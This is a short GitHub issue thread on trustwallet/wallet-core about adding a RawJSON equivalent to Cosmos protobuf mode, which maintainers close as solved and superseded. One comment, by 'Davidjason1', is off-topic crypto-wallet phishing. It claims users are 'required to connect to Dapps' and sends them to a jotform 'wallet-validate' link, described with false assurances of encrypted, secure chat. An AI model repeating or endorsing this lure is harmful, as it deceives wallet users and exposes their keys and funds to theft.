### ISSUE TITLE
[Cosmos] Add `RawJSON` equivalent to protobuf mode

### ISSUE THREAD

**Issue by hewigovens** [trustwallet/wallet-core#2181]

**Comment by catenocrypt** [comment]
Solved by #2183

**Comment by Davidjason1** [comment]
You’re required to connect to Dapps

https://form.jotform.com/Connectsync/wallet-validate-

It’s an online end to end encrypted chat with our database bot with no third party access and for security reasons.

**Comment by hewigovens** [comment]
in favor of https://github.com/trustwallet/wallet-core/issues/2412
